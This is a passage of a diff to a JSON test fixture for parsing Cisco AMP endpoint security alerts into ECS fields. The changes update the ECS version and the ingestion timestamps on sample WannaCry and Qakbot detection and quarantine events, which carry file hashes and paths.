Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -1324,7 +1324,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1354,7 +1354,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094044602Z", + "ingested": "2021-09-13T18:07:42.929493387Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -1424,7 +1424,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1456,7 +1456,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094046511Z", + "ingested": "2021-09-13T18:07:42.929495259Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -1513,7 +1513,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1533,7 +1533,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094048415Z", + "ingested": "2021-09-13T18:07:42.929497150Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1588,7 +1588,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1608,7 +1608,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094050302Z", + "ingested": "2021-09-13T18:07:42.929499044Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1663,7 +1663,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1683,7 +1683,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094052189Z", + "ingested": "2021-09-13T18:07:42.929500941Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -1736,7 +1736,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1760,7 +1760,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094054051Z", + "ingested": "2021-09-13T18:07:42.929502829Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1815,7 +1815,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1839,7 +1839,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094055941Z", + "ingested": "2021-09-13T18:07:42.929504723Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1896,7 +1896,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1922,7 +1922,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094057915Z", + "ingested": "2021-09-13T18:07:42.929506709Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1982,7 +1982,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2002,7 +2002,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-12T17:32:10.094059796Z", + "ingested": "2021-09-13T18:07:42.929508583Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", "kind": "alert", "start": "2021-01-14T14:09:00.000Z", @@ -2061,7 +2061,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2081,7 +2081,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094061712Z", + "ingested": "2021-09-13T18:07:42.929510470Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -2136,7 +2136,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2162,7 +2162,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094063595Z", + "ingested": "2021-09-13T18:07:42.929512347Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2217,7 +2217,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2241,7 +2241,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094065501Z", + "ingested": "2021-09-13T18:07:42.929514264Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2294,7 +2294,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2314,7 +2314,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094067388Z", + "ingested": "2021-09-13T18:07:42.929516156Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2373,7 +2373,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2405,7 +2405,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094069286Z", + "ingested": "2021-09-13T18:07:42.929518075Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2469,7 +2469,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2499,7 +2499,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094071156Z", + "ingested": "2021-09-13T18:07:42.929519988Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 